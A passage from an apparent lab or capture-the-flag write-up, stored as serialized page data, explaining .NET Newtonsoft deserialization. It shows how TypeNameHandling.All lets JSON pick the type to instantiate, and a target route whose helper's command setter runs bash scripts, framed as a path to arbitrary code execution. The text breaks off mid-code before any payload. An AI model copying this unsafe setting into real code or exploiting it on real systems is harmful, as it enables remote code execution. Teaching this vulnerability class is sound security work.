":306},[37566],{"type":38,"value":37279},{"type":33,"tag":128,"props":37568,"children":37569},{"st
yle":312},[37570],{"type":38,"value":215},{"type":33,"tag":128,"props":37572,"children":37573},{"style":306},[37574],{"type":38,"value":37288},{"type":33,"tag":128,"props":37576,"children":37577},{"class":130,"line":1202},[37578],{"type":33,"tag":128,"props":37579,"children":37580},{"style":312},[37581],{"type":38,"value":37296},{"type":33,"tag":128,"props":37583,"children":37584},{"class":130,"line":1214},[37585],{"type":33,"tag":128,"props":37586,"children":37587},{"emptyLinePlaceholder":896},[37588],{"type":38,"value":899},{"type":33,"tag":128,"props":37590,"children":37591},{"class":130,"line":1226},[37592,37596,37600,37604,37608,37612,37616,37620,37624,37628,37632,37636],{"type":33,"tag":128,"props":37593,"children":37594},{"style":30339},[37595],{"type":38,"value":35779},{"type":33,"tag":128,"props":37597,"children":37598},{"style":312},[37599],{"type":38,"value":5977},{"type":33,"tag":128,"props":37601,"children":37602},{"style":30339},[37603],{"type":38,"value":35788},{"type":33,"tag":128,"props":37605,"children":37606},{"style":312},[37607],{"type":38,"value":6054},{"type":33,"tag":128,"props":37609,"children":37610},{"style":135},[37611],{"type":38,"value":35797},{"type":33,"tag":128,"props":37613,"children":37614},{"style":312},[37615],{"type":38,"value":5657},{"type":33,"tag":128,"props":37617,"children":37618},{"style":306},[37619],{"type":38,"value":37506},{"type":33,"tag":128,"props":37621,"children":37622},{"style":300},[37623],{"type":38,"value":10759},{"type":33,"tag":128,"props":37625,"children":37626},{"style":30339},[37627],{"type":38,"value":36296},{"type":33,"tag":128,"props":37629,"children":37630},{"style":312},[37631],{"type":38,"value":5977},{"type":33,"tag":128,"props":37633,"children":37634},{"style":30339},[37635],{"type":38,"value":35788},{"type":33,"tag":128,"props":37637,"children":37638},{"style":312},[37639],{"type":38,"value":37640},">;\n",{"type":33,"tag":128,"props":37642,"children":37643},{"class":130,"line":1239},[37644],{"typ
e":33,"tag":128,"props":37645,"children":37646},{"emptyLinePlaceholder":896},[37647],{"type":38,"value":899},{"type":33,"tag":128,"props":37649,"children":37650},{"class":130,"line":1251},[37651,37655,37659],{"type":33,"tag":128,"props":37652,"children":37653},{"style":1576},[37654],{"type":38,"value":26723},{"type":33,"tag":128,"props":37656,"children":37657},{"style":306},[37658],{"type":38,"value":35797},{"type":33,"tag":128,"props":37660,"children":37661},{"style":312},[37662],{"type":38,"value":5676},{"type":33,"tag":128,"props":37664,"children":37665},{"class":130,"line":1263},[37666],{"type":33,"tag":128,"props":37667,"children":37668},{"style":312},[37669],{"type":38,"value":15318},{"type":33,"tag":128,"props":37671,"children":37672},{"class":130,"line":1276},[37673],{"type":33,"tag":128,"props":37674,"children":37675},{"style":312},[37676],{"type":38,"value":6760},{"type":33,"tag":128,"props":37678,"children":37679},{"class":130,"line":1288},[37680],{"type":33,"tag":128,"props":37681,"children":37682},{"style":312},[37683],{"type":38,"value":854},{"type":33,"tag":47,"props":37685,"children":37686},{},[37687],{"type":33,"tag":2302,"props":37688,"children":37689},{},[37690],{"type":38,"value":37691},"It is also important to note that the class responsible for deserializing the objects also encodes and decodes them in base64.",{"type":33,"tag":81,"props":37693,"children":37695},{"id":37694},"what-is-a-serialization",[37696],{"type":38,"value":37697},"What is serialization?",{"type":33,"tag":47,"props":37699,"children":37700},{},[37701],{"type":38,"value":37702},"Serialization and deserialization are essential processes in computer science that involve converting data into a format that can be easily stored, transmitted, or reconstructed.",{"type":33,"tag":47,"props":37704,"children":37705},{},[37706],{"type":38,"value":37707},"Serialization refers to the process of converting an object or data structure into a format (often a byte stream) that can be easily stored in 
memory. During serialization, complex data structures or objects are converted into a linear stream of bytes that can be easily reconstructed back into the original format when needed.",{"type":33,"tag":47,"props":37709,"children":37710},{},[37711],{"type":38,"value":37712},"The \"deserialization vulnerability\" in C# and other programming languages arises from the mishandling or inadequate validation of serialized data, leading to potential security risks.",{"type":33,"tag":47,"props":37714,"children":37715},{},[37716],{"type":38,"value":37717},"When data is deserialized, it is converted from its serialized form (often binary or text) back into an object or data structure. If this process is not properly secured, an attacker may exploit it by supplying crafted input to the deserializer, leading to various security issues.",{"type":33,"tag":47,"props":37719,"children":37720},{},[37721],{"type":38,"value":37722},"Suppose our target is a .NET program or website that accepts JSON data over the network, perhaps via an HTTP header. 
When it reaches the server, the data is converted (deserialized) from JSON text into an instance of the Person class that the .NET code can use.",{"type":33,"tag":47,"props":37724,"children":37725},{},[37726],{"type":38,"value":37727},"If the conversion process is configured inadequately, we can specify a different .NET class for the data to be turned into, instead of it automatically being converted back into the Person class.",{"type":33,"tag":47,"props":37729,"children":37730},{},[37731],{"type":38,"value":37732},"Here is a quick example with a simple Person class.",{"type":33,"tag":47,"props":37734,"children":37735},{},[37736],{"type":38,"value":37737},"In the code below, we have a class that we serialize and deserialize:",{"type":33,"tag":114,"props":37739,"children":37740},{"lang":35074},[37741],{"type":33,"tag":119,"props":37742,"children":37744},{"code":37743,"language":35074,"meta":8,"className":35079,"style":8},"using System;\nusing Newtonsoft.Json;\nusing System.Collections.Generic;\n\n class Person\n {\n     public string Name { get; set; }\n     public int Age { get; set; }\n }\n\n\npublic class Program\n{\n    public static void Main()\n    {\n        Person person = new Person { Name = \"John\", Age = 30 };\n        \n        string json = JsonConvert.SerializeObject(person);\n        Console.WriteLine(\"Serialized Person:\");\n        Console.WriteLine(json);\n        Person deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n        Console.WriteLine(\"\\nDeserialized Person:\");\n        Console.WriteLine(\"Name:\" + deserializedPerson.Name + \" Age:\" + deserializedPerson.Age);\n    
}\n}\n",[37745],{"type":33,"tag":105,"props":37746,"children":37747},{"__ignoreMap":8},[37748,37764,37787,37820,37827,37839,37846,37889,37929,37936,37943,37950,37966,37973,37998,38005,38078,38085,38126,38164,38191,38241,38282,38369,38376],{"type":33,"tag":128,"props":37749,"children":37750},{"class":130,"line":131},[37751,37755,37760],{"type":33,"tag":128,"props":37752,"children":37753},{"style":1576},[37754],{"type":38,"value":37044},{"type":33,"tag":128,"props":37756,"children":37757},{"style":30339},[37758],{"type":38,"value":37759}," System",{"type":33,"tag":128,"props":37761,"children":37762},{"style":312},[37763],{"type":38,"value":5676},{"type":33,"tag":128,"props":37765,"children":37766},{"class":130,"line":362},[37767,37771,37775,37779,37783],{"type":33,"tag":128,"props":37768,"children":37769},{"style":1576},[37770],{"type":38,"value":37044},{"type":33,"tag":128,"props":37772,"children":37773},{"style":30339},[37774],{"type":38,"value":37049},{"type":33,"tag":128,"props":37776,"children":37777},{"style":312},[37778],{"type":38,"value":215},{"type":33,"tag":128,"props":37780,"children":37781},{"style":30339},[37782],{"type":38,"value":37058},{"type":33,"tag":128,"props":37784,"children":37785},{"style":312},[37786],{"type":38,"value":5676},{"type":33,"tag":128,"props":37788,"children":37789},{"class":130,"line":403},[37790,37794,37798,37802,37807,37811,37816],{"type":33,"tag":128,"props":37791,"children":37792},{"style":1576},[37793],{"type":38,"value":37044},{"type":33,"tag":128,"props":37795,"children":37796},{"style":30339},[37797],{"type":38,"value":37759},{"type":33,"tag":128,"props":37799,"children":37800},{"style":312},[37801],{"type":38,"value":215},{"type":33,"tag":128,"props":37803,"children":37804},{"style":30339},[37805],{"type":38,"value":37806},"Collections",{"type":33,"tag":128,"props":37808,"children":37809},{"style":312},[37810],{"type":38,"value":215},{"type":33,"tag":128,"props":37812,"children":37813},{"style":30339},[37814],{"type":38,"
value":37815},"Generic",{"type":33,"tag":128,"props":37817,"children":37818},{"style":312},[37819],{"type":38,"value":5676},{"type":33,"tag":128,"props":37821,"children":37822},{"class":130,"line":739},[37823],{"type":33,"tag":128,"props":37824,"children":37825},{"emptyLinePlaceholder":896},[37826],{"type":38,"value":899},{"type":33,"tag":128,"props":37828,"children":37829},{"class":130,"line":765},[37830,37834],{"type":33,"tag":128,"props":37831,"children":37832},{"style":300},[37833],{"type":38,"value":6009},{"type":33,"tag":128,"props":37835,"children":37836},{"style":30339},[37837],{"type":38,"value":37838}," Person\n",{"type":33,"tag":128,"props":37840,"children":37841},{"class":130,"line":804},[37842],{"type":33,"tag":128,"props":37843,"children":37844},{"style":312},[37845],{"type":38,"value":762},{"type":33,"tag":128,"props":37847,"children":37848},{"class":130,"line":839},[37849,37854,37858,37863,37867,37872,37876,37880,37884],{"type":33,"tag":128,"props":37850,"children":37851},{"style":300},[37852],{"type":38,"value":37853},"     public",{"type":33,"tag":128,"props":37855,"children":37856},{"style":1576},[37857],{"type":38,"value":35330},{"type":33,"tag":128,"props":37859,"children":37860},{"style":135},[37861],{"type":38,"value":37862}," Name",{"type":33,"tag":128,"props":37864,"children":37865},{"style":312},[37866],{"type":38,"value":5642},{"type":33,"tag":128,"props":37868,"children":37869},{"style":300},[37870],{"type":38,"value":37871}," get",{"type":33,"tag":128,"props":37873,"children":37874},{"style":312},[37875],{"type":38,"value":35231},{"type":33,"tag":128,"props":37877,"children":37878},{"style":300},[37879],{"type":38,"value":186},{"type":33,"tag":128,"props":37881,"children":37882},{"style":312},[37883],{"type":38,"value":35231},{"type":33,"tag":128,"props":37885,"children":37886},{"style":312},[37887],{"type":38,"value":37888}," 
}\n",{"type":33,"tag":128,"props":37890,"children":37891},{"class":130,"line":848},[37892,37896,37900,37905,37909,37913,37917,37921,37925],{"type":33,"tag":128,"props":37893,"children":37894},{"style":300},[37895],{"type":38,"value":37853},{"type":33,"tag":128,"props":37897,"children":37898},{"style":1576},[37899],{"type":38,"value":31859},{"type":33,"tag":128,"props":37901,"children":37902},{"style":135},[37903],{"type":38,"value":37904}," Age",{"type":33,"tag":128,"props":37906,"children":37907},{"style":312},[37908],{"type":38,"value":5642},{"type":33,"tag":128,"props":37910,"children":37911},{"style":300},[37912],{"type":38,"value":37871},{"type":33,"tag":128,"props":37914,"children":37915},{"style":312},[37916],{"type":38,"value":35231},{"type":33,"tag":128,"props":37918,"children":37919},{"style":300},[37920],{"type":38,"value":186},{"type":33,"tag":128,"props":37922,"children":37923},{"style":312},[37924],{"type":38,"value":35231},{"type":33,"tag":128,"props":37926,"children":37927},{"style":312},[37928],{"type":38,"value":37888},{"type":33,"tag":128,"props":37930,"children":37931},{"class":130,"line":976},[37932],{"type":33,"tag":128,"props":37933,"children":37934},{"style":312},[37935],{"type":38,"value":37888},{"type":33,"tag":128,"props":37937,"children":37938},{"class":130,"line":988},[37939],{"type":33,"tag":128,"props":37940,"children":37941},{"emptyLinePlaceholder":896},[37942],{"type":38,"value":899},{"type":33,"tag":128,"props":37944,"children":37945},{"class":130,"line":1001},[37946],{"type":33,"tag":128,"props":37947,"children":37948},{"emptyLinePlaceholder":896},[37949],{"type":38,"value":899},{"type":33,"tag":128,"props":37951,"children":37952},{"class":130,"line":1014},[37953,37957,37961],{"type":33,"tag":128,"props":37954,"children":37955},{"style":300},[37956],{"type":38,"value":25953},{"type":33,"tag":128,"props":37958,"children":37959},{"style":300},[37960],{"type":38,"value":6009},{"type":33,"tag":128,"props":37962,"children":37963},{"styl
e":30339},[37964],{"type":38,"value":37965}," Program\n",{"type":33,"tag":128,"props":37967,"children":37968},{"class":130,"line":1026},[37969],{"type":33,"tag":128,"props":37970,"children":37971},{"style":312},[37972],{"type":38,"value":650},{"type":33,"tag":128,"props":37974,"children":37975},{"class":130,"line":1038},[37976,37980,37984,37989,37994],{"type":33,"tag":128,"props":37977,"children":37978},{"style":300},[37979],{"type":38,"value":37130},{"type":33,"tag":128,"props":37981,"children":37982},{"style":300},[37983],{"type":38,"value":25958},{"type":33,"tag":128,"props":37985,"children":37986},{"style":1576},[37987],{"type":38,"value":37988}," void",{"type":33,"tag":128,"props":37990,"children":37991},{"style":135},[37992],{"type":38,"value":37993}," Main",{"type":33,"tag":128,"props":37995,"children":37996},{"style":312},[37997],{"type":38,"value":7857},{"type":33,"tag":128,"props":37999,"children":38000},{"class":130,"line":1051},[38001],{"type":33,"tag":128,"props":38002,"children":38003},{"style":312},[38004],{"type":38,"value":12699},{"type":33,"tag":128,"props":38006,"children":38007},{"class":130,"line":1063},[38008,38013,38018,38022,38026,38031,38035,38039,38043,38047,38052,38056,38060,38064,38068,38073],{"type":33,"tag":128,"props":38009,"children":38010},{"style":30339},[38011],{"type":38,"value":38012},"        Person",{"type":33,"tag":128,"props":38014,"children":38015},{"style":135},[38016],{"type":38,"value":38017}," person",{"type":33,"tag":128,"props":38019,"children":38020},{"style":312},[38021],{"type":38,"value":5657},{"type":33,"tag":128,"props":38023,"children":38024},{"style":300},[38025],{"type":38,"value":13061},{"type":33,"tag":128,"props":38027,"children":38028},{"style":30339},[38029],{"type":38,"value":38030}," 
Person",{"type":33,"tag":128,"props":38032,"children":38033},{"style":312},[38034],{"type":38,"value":5642},{"type":33,"tag":128,"props":38036,"children":38037},{"style":306},[38038],{"type":38,"value":37862},{"type":33,"tag":128,"props":38040,"children":38041},{"style":312},[38042],{"type":38,"value":5657},{"type":33,"tag":128,"props":38044,"children":38045},{"style":676},[38046],{"type":38,"value":679},{"type":33,"tag":128,"props":38048,"children":38049},{"style":140},[38050],{"type":38,"value":38051},"John",{"type":33,"tag":128,"props":38053,"children":38054},{"style":676},[38055],{"type":38,"value":669},{"type":33,"tag":128,"props":38057,"children":38058},{"style":312},[38059],{"type":38,"value":5584},{"type":33,"tag":128,"props":38061,"children":38062},{"style":306},[38063],{"type":38,"value":37904},{"type":33,"tag":128,"props":38065,"children":38066},{"style":312},[38067],{"type":38,"value":5657},{"type":33,"tag":128,"props":38069,"children":38070},{"style":523},[38071],{"type":38,"value":38072}," 30",{"type":33,"tag":128,"props":38074,"children":38075},{"style":312},[38076],{"type":38,"value":38077}," };\n",{"type":33,"tag":128,"props":38079,"children":38080},{"class":130,"line":1076},[38081],{"type":33,"tag":128,"props":38082,"children":38083},{"style":323},[38084],{"type":38,"value":29323},{"type":33,"tag":128,"props":38086,"children":38087},{"class":130,"line":1089},[38088,38093,38097,38101,38105,38109,38113,38117,38122],{"type":33,"tag":128,"props":38089,"children":38090},{"style":1576},[38091],{"type":38,"value":38092},"        
string",{"type":33,"tag":128,"props":38094,"children":38095},{"style":135},[38096],{"type":38,"value":10630},{"type":33,"tag":128,"props":38098,"children":38099},{"style":312},[38100],{"type":38,"value":5657},{"type":33,"tag":128,"props":38102,"children":38103},{"style":306},[38104],{"type":38,"value":37224},{"type":33,"tag":128,"props":38106,"children":38107},{"style":312},[38108],{"type":38,"value":215},{"type":33,"tag":128,"props":38110,"children":38111},{"style":135},[38112],{"type":38,"value":37233},{"type":33,"tag":128,"props":38114,"children":38115},{"style":312},[38116],{"type":38,"value":5566},{"type":33,"tag":128,"props":38118,"children":38119},{"style":306},[38120],{"type":38,"value":38121},"person",{"type":33,"tag":128,"props":38123,"children":38124},{"style":312},[38125],{"type":38,"value":5815},{"type":33,"tag":128,"props":38127,"children":38128},{"class":130,"line":1101},[38129,38134,38138,38143,38147,38151,38156,38160],{"type":33,"tag":128,"props":38130,"children":38131},{"style":306},[38132],{"type":38,"value":38133},"        Console",{"type":33,"tag":128,"props":38135,"children":38136},{"style":312},[38137],{"type":38,"value":215},{"type":33,"tag":128,"props":38139,"children":38140},{"style":135},[38141],{"type":38,"value":38142},"WriteLine",{"type":33,"tag":128,"props":38144,"children":38145},{"style":312},[38146],{"type":38,"value":5566},{"type":33,"tag":128,"props":38148,"children":38149},{"style":676},[38150],{"type":38,"value":669},{"type":33,"tag":128,"props":38152,"children":38153},{"style":140},[38154],{"type":38,"value":38155},"Serialized 
Person:",{"type":33,"tag":128,"props":38157,"children":38158},{"style":676},[38159],{"type":38,"value":669},{"type":33,"tag":128,"props":38161,"children":38162},{"style":312},[38163],{"type":38,"value":5815},{"type":33,"tag":128,"props":38165,"children":38166},{"class":130,"line":1114},[38167,38171,38175,38179,38183,38187],{"type":33,"tag":128,"props":38168,"children":38169},{"style":306},[38170],{"type":38,"value":38133},{"type":33,"tag":128,"props":38172,"children":38173},{"style":312},[38174],{"type":38,"value":215},{"type":33,"tag":128,"props":38176,"children":38177},{"style":135},[38178],{"type":38,"value":38142},{"type":33,"tag":128,"props":38180,"children":38181},{"style":312},[38182],{"type":38,"value":5566},{"type":33,"tag":128,"props":38184,"children":38185},{"style":306},[38186],{"type":38,"value":633},{"type":33,"tag":128,"props":38188,"children":38189},{"style":312},[38190],{"type":38,"value":5815},{"type":33,"tag":128,"props":38192,"children":38193},{"class":130,"line":1127},[38194,38198,38203,38207,38211,38215,38219,38223,38228,38233,38237],{"type":33,"tag":128,"props":38195,"children":38196},{"style":30339},[38197],{"type":38,"value":38012},{"type":33,"tag":128,"props":38199,"children":38200},{"style":135},[38201],{"type":38,"value":38202}," 
deserializedPerson",{"type":33,"tag":128,"props":38204,"children":38205},{"style":312},[38206],{"type":38,"value":5657},{"type":33,"tag":128,"props":38208,"children":38209},{"style":306},[38210],{"type":38,"value":37224},{"type":33,"tag":128,"props":38212,"children":38213},{"style":312},[38214],{"type":38,"value":215},{"type":33,"tag":128,"props":38216,"children":38217},{"style":135},[38218],{"type":38,"value":37523},{"type":33,"tag":128,"props":38220,"children":38221},{"style":312},[38222],{"type":38,"value":5977},{"type":33,"tag":128,"props":38224,"children":38225},{"style":30339},[38226],{"type":38,"value":38227},"Person",{"type":33,"tag":128,"props":38229,"children":38230},{"style":312},[38231],{"type":38,"value":38232},">(",{"type":33,"tag":128,"props":38234,"children":38235},{"style":306},[38236],{"type":38,"value":633},{"type":33,"tag":128,"props":38238,"children":38239},{"style":312},[38240],{"type":38,"value":5815},{"type":33,"tag":128,"props":38242,"children":38243},{"class":130,"line":1139},[38244,38248,38252,38256,38260,38264,38269,38274,38278],{"type":33,"tag":128,"props":38245,"children":38246},{"style":306},[38247],{"type":38,"value":38133},{"type":33,"tag":128,"props":38249,"children":38250},{"style":312},[38251],{"type":38,"value":215},{"type":33,"tag":128,"props":38253,"children":38254},{"style":135},[38255],{"type":38,"value":38142},{"type":33,"tag":128,"props":38257,"children":38258},{"style":312},[38259],{"type":38,"value":5566},{"type":33,"tag":128,"props":38261,"children":38262},{"style":676},[38263],{"type":38,"value":669},{"type":33,"tag":128,"props":38265,"children":38266},{"style":151},[38267],{"type":38,"value":38268},"\\n",{"type":33,"tag":128,"props":38270,"children":38271},{"style":140},[38272],{"type":38,"value":38273},"Deserialized 
Person:",{"type":33,"tag":128,"props":38275,"children":38276},{"style":676},[38277],{"type":38,"value":669},{"type":33,"tag":128,"props":38279,"children":38280},{"style":312},[38281],{"type":38,"value":5815},{"type":33,"tag":128,"props":38283,"children":38284},{"class":130,"line":1152},[38285,38289,38293,38297,38301,38305,38310,38314,38318,38322,38326,38331,38335,38339,38344,38348,38352,38356,38360,38365],{"type":33,"tag":128,"props":38286,"children":38287},{"style":306},[38288],{"type":38,"value":38133},{"type":33,"tag":128,"props":38290,"children":38291},{"style":312},[38292],{"type":38,"value":215},{"type":33,"tag":128,"props":38294,"children":38295},{"style":135},[38296],{"type":38,"value":38142},{"type":33,"tag":128,"props":38298,"children":38299},{"style":312},[38300],{"type":38,"value":5566},{"type":33,"tag":128,"props":38302,"children":38303},{"style":676},[38304],{"type":38,"value":669},{"type":33,"tag":128,"props":38306,"children":38307},{"style":140},[38308],{"type":38,"value":38309},"Name:",{"type":33,"tag":128,"props":38311,"children":38312},{"style":676},[38313],{"type":38,"value":669},{"type":33,"tag":128,"props":38315,"children":38316},{"style":300},[38317],{"type":38,"value":8297},{"type":33,"tag":128,"props":38319,"children":38320},{"style":306},[38321],{"type":38,"value":38202},{"type":33,"tag":128,"props":38323,"children":38324},{"style":312},[38325],{"type":38,"value":215},{"type":33,"tag":128,"props":38327,"children":38328},{"style":306},[38329],{"type":38,"value":38330},"Name",{"type":33,"tag":128,"props":38332,"children":38333},{"style":300},[38334],{"type":38,"value":8297},{"type":33,"tag":128,"props":38336,"children":38337},{"style":676},[38338],{"type":38,"value":679},{"type":33,"tag":128,"props":38340,"children":38341},{"style":140},[38342],{"type":38,"value":38343}," 
Age:",{"type":33,"tag":128,"props":38345,"children":38346},{"style":676},[38347],{"type":38,"value":669},{"type":33,"tag":128,"props":38349,"children":38350},{"style":300},[38351],{"type":38,"value":8297},{"type":33,"tag":128,"props":38353,"children":38354},{"style":306},[38355],{"type":38,"value":38202},{"type":33,"tag":128,"props":38357,"children":38358},{"style":312},[38359],{"type":38,"value":215},{"type":33,"tag":128,"props":38361,"children":38362},{"style":306},[38363],{"type":38,"value":38364},"Age",{"type":33,"tag":128,"props":38366,"children":38367},{"style":312},[38368],{"type":38,"value":5815},{"type":33,"tag":128,"props":38370,"children":38371},{"class":130,"line":1165},[38372],{"type":33,"tag":128,"props":38373,"children":38374},{"style":312},[38375],{"type":38,"value":6760},{"type":33,"tag":128,"props":38377,"children":38378},{"class":130,"line":1177},[38379],{"type":33,"tag":128,"props":38380,"children":38381},{"style":312},[38382],{"type":38,"value":854},{"type":33,"tag":47,"props":38384,"children":38385},{},[38386],{"type":38,"value":38387},"The output of this code is as follows:",{"type":33,"tag":114,"props":38389,"children":38390},{"lang":25649},[38391],{"type":33,"tag":119,"props":38392,"children":38394},{"code":38393},"Serialized Person:\n{\"Name\":\"John\",\"Age\":30}\n\nDeserialized Person:\nName:John Age:30\n",[38395],{"type":33,"tag":105,"props":38396,"children":38397},{"__ignoreMap":8},[38398],{"type":38,"value":38393},{"type":33,"tag":81,"props":38400,"children":38402},{"id":38401},"so-what-is-the-problem",[38403],{"type":38,"value":38404},"So what is the problem?",{"type":33,"tag":47,"props":38406,"children":38407},{},[38408],{"type":38,"value":38409},"In our case, the deserialization is properly protected: our data contains a simple JSON string representing a Person object.",{"type":33,"tag":47,"props":38411,"children":38412},{},[38413,38415,38421],{"type":38,"value":38414},"The unsafe use of deserialization occurs when the 
",{"type":33,"tag":105,"props":38416,"children":38418},{"className":38417},[],[38419],{"type":38,"value":38420},"TypeNameHandling.All",{"type":38,"value":38422}," option is set in the JsonSerializerSettings passed as the second parameter of DeserializeObject. With this setting, the deserializer honors the $type property of the incoming JSON to decide which .NET type to instantiate, so it allows us to deserialize an object of our choice and to set the values of its attributes. Newtonsoft's own documentation warns against using any TypeNameHandling value other than None on JSON from an untrusted source unless the incoming types are restricted with a custom SerializationBinder.",{"type":33,"tag":114,"props":38424,"children":38425},{"lang":35074},[38426],{"type":33,"tag":119,"props":38427,"children":38429},{"code":38428,"language":35074,"meta":8,"className":35079,"style":8},"// With safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n\n// Without safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json, new JsonSerializerSettings {\n                TypeNameHandling = TypeNameHandling.All\n});\n",[38430],{"type":33,"tag":105,"props":38431,"children":38432},{"__ignoreMap":8},[38433,38441,38488,38495,38503,38563,38586],{"type":33,"tag":128,"props":38434,"children":38435},{"class":130,"line":131},[38436],{"type":33,"tag":128,"props":38437,"children":38438},{"style":5541},[38439],{"type":38,"value":38440},"// With safe 
deserialization\n",{"type":33,"tag":128,"props":38442,"children":38443},{"class":130,"line":362},[38444,38448,38452,38456,38460,38464,38468,38472,38476,38480,38484],{"type":33,"tag":128,"props":38445,"children":38446},{"style":30339},[38447],{"type":38,"value":38227},{"type":33,"tag":128,"props":38449,"children":38450},{"style":135},[38451],{"type":38,"value":38202},{"type":33,"tag":128,"props":38453,"children":38454},{"style":312},[38455],{"type":38,"value":5657},{"type":33,"tag":128,"props":38457,"children":38458},{"style":306},[38459],{"type":38,"value":37224},{"type":33,"tag":128,"props":38461,"children":38462},{"style":312},[38463],{"type":38,"value":215},{"type":33,"tag":128,"props":38465,"children":38466},{"style":135},[38467],{"type":38,"value":37523},{"type":33,"tag":128,"props":38469,"children":38470},{"style":312},[38471],{"type":38,"value":5977},{"type":33,"tag":128,"props":38473,"children":38474},{"style":30339},[38475],{"type":38,"value":38227},{"type":33,"tag":128,"props":38477,"children":38478},{"style":312},[38479],{"type":38,"value":38232},{"type":33,"tag":128,"props":38481,"children":38482},{"style":306},[38483],{"type":38,"value":633},{"type":33,"tag":128,"props":38485,"children":38486},{"style":312},[38487],{"type":38,"value":5815},{"type":33,"tag":128,"props":38489,"children":38490},{"class":130,"line":403},[38491],{"type":33,"tag":128,"props":38492,"children":38493},{"emptyLinePlaceholder":896},[38494],{"type":38,"value":899},{"type":33,"tag":128,"props":38496,"children":38497},{"class":130,"line":739},[38498],{"type":33,"tag":128,"props":38499,"children":38500},{"style":5541},[38501],{"type":38,"value":38502},"// Without safe 
deserialization\n",{"type":33,"tag":128,"props":38504,"children":38505},{"class":130,"line":765},[38506,38510,38514,38518,38522,38526,38530,38534,38538,38542,38546,38550,38554,38559],{"type":33,"tag":128,"props":38507,"children":38508},{"style":30339},[38509],{"type":38,"value":38227},{"type":33,"tag":128,"props":38511,"children":38512},{"style":135},[38513],{"type":38,"value":38202},{"type":33,"tag":128,"props":38515,"children":38516},{"style":312},[38517],{"type":38,"value":5657},{"type":33,"tag":128,"props":38519,"children":38520},{"style":306},[38521],{"type":38,"value":37224},{"type":33,"tag":128,"props":38523,"children":38524},{"style":312},[38525],{"type":38,"value":215},{"type":33,"tag":128,"props":38527,"children":38528},{"style":135},[38529],{"type":38,"value":37523},{"type":33,"tag":128,"props":38531,"children":38532},{"style":312},[38533],{"type":38,"value":5977},{"type":33,"tag":128,"props":38535,"children":38536},{"style":30339},[38537],{"type":38,"value":38227},{"type":33,"tag":128,"props":38539,"children":38540},{"style":312},[38541],{"type":38,"value":38232},{"type":33,"tag":128,"props":38543,"children":38544},{"style":306},[38545],{"type":38,"value":633},{"type":33,"tag":128,"props":38547,"children":38548},{"style":312},[38549],{"type":38,"value":5584},{"type":33,"tag":128,"props":38551,"children":38552},{"style":300},[38553],{"type":38,"value":13061},{"type":33,"tag":128,"props":38555,"children":38556},{"style":30339},[38557],{"type":38,"value":38558}," 
JsonSerializerSettings",{"type":33,"tag":128,"props":38560,"children":38561},{"style":312},[38562],{"type":38,"value":762},{"type":33,"tag":128,"props":38564,"children":38565},{"class":130,"line":804},[38566,38570,38574,38578,38582],{"type":33,"tag":128,"props":38567,"children":38568},{"style":306},[38569],{"type":38,"value":37270},{"type":33,"tag":128,"props":38571,"children":38572},{"style":312},[38573],{"type":38,"value":5657},{"type":33,"tag":128,"props":38575,"children":38576},{"style":306},[38577],{"type":38,"value":37279},{"type":33,"tag":128,"props":38579,"children":38580},{"style":312},[38581],{"type":38,"value":215},{"type":33,"tag":128,"props":38583,"children":38584},{"style":306},[38585],{"type":38,"value":37288},{"type":33,"tag":128,"props":38587,"children":38588},{"class":130,"line":839},[38589],{"type":33,"tag":128,"props":38590,"children":38591},{"style":312},[38592],{"type":38,"value":5902},{"type":33,"tag":47,"props":38594,"children":38595},{},[38596],{"type":38,"value":38597},"If we execute the previous code with the TypeNameHandling.All option, serialization and deserialization still succeed, but the serialized output is different.",{"type":33,"tag":114,"props":38599,"children":38600},{"lang":25649},[38601],{"type":33,"tag":119,"props":38602,"children":38604},{"code":38603},"Serialized Person:\n{\"$type\":\"Person, ExampleNameSpace\",\"Name\":\"John\",\"Age\":30}\n",[38605],{"type":33,"tag":105,"props":38606,"children":38607},{"__ignoreMap":8},[38608],{"type":38,"value":38603},{"type":33,"tag":47,"props":38610,"children":38611},{},[38612,38614,38620,38622,38627],{"type":38,"value":38613},"We can see now the json contains an attribute ",{"type":33,"tag":105,"props":38615,"children":38617},{"className":38616},[],[38618],{"type":38,"value":38619},"$type",{"type":38,"value":38621}," whose value is the assembly-qualified type name: the type, then the assembly it is defined in (here Person, ExampleNameSpace). 
Then, the elements following ",{"type":33,"tag":105,"props":38623,"children":38625},{"className":38624},[],[38626],{"type":38,"value":38619},{"type":38,"value":38628}," are the attributes of the class (Name and Age).",{"type":33,"tag":47,"props":38630,"children":38631},{},[38632,38634],{"type":38,"value":38633},"The format of the JSON is different, ",{"type":33,"tag":2302,"props":38635,"children":38636},{},[38637],{"type":38,"value":38638},"but the important point is that with this unsafe option the JSON, not the application, decides which type is instantiated: unless a restrictive SerializationBinder is configured, any type the runtime can load can be named in $type and have its properties set.",{"type":33,"tag":47,"props":38640,"children":38641},{},[38642],{"type":38,"value":38643},"To recap: we can create an instance of a type of our choice and set the values of its properties, which means every property setter of that type becomes reachable with attacker-controlled data.",{"type":33,"tag":47,"props":38645,"children":38646},{},[38647,38649,38655],{"type":38,"value":38648},"If we take a closer look at the ",{"type":33,"tag":105,"props":38650,"children":38652},{"className":38651},[],[38653],{"type":38,"value":38654},"/status",{"type":38,"value":38656}," route, it uses a helper class whose command property setter spawns a system process. 
This class could be interesting for us in our case because if we manage to deserialize an instance of this class, it will then be easy for us to execute arbitrary code.",{"type":33,"tag":114,"props":38658,"children":38659},{"lang":35074},[38660],{"type":33,"tag":119,"props":38661,"children":38663},{"code":38662,"language":35074,"meta":8,"className":35079,"style":8},"[Route(\"/status\")]\n[HttpGet]\npublic IActionResult Status()\n{\n  StatusCheckHelper statusCheckHelper = new StatusCheckHelper();\n\n  statusCheckHelper.command = \"bash /tmp/cpu.sh\";\n  string cpuUsage = statusCheckHelper.output;\n\n  statusCheckHelper.command = \"bash /tmp/mem.sh\";\n  string memoryUsage = statusCheckHelper.output;\n\n  statusCheckHelper.command = \"bash /tmp/disk.sh\";\n  string diskUsage = statusCheckHelper.output;\n\n  return Content($\"CPU Usage: {cpuUsage}\\nMemory Usage: {memoryUsage}\\nDisk Space: 